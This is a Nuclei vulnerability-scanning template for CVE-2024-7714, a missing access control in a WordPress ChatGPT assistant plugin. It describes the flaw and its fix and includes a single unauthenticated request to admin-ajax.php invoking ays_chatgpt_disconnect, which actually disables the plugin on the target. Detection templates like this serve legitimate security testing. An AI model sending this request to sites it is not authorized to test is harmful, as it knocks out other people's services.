nuclei-templates/http/cves/2024/CVE-2024-7714.yaml

41 lines
1.6 KiB
YAML

id: CVE-2024-7714
info:
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
author: s4e-io
severity: medium
description: |
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
remediation: Fixed in 2.1.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-7714
cwe-id: CWE-284
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 1
vendor: ays-chatgpt-assistant-team
product: ays-chatgpt-assistant
framework: wordpress
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"
matchers:
- type: dsl
dsl:
- 'regex("^true$", body)'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100bdbe7d7b2f2802d87ca36eead8ef342616ac2deb6b62ad553f0c670ecd70a9f202210090cdb0adf148998469c6456de76728a9b85a9d162b3ee02af89f59394e8c4c60:922c64590222798bb761d5b6d8e72950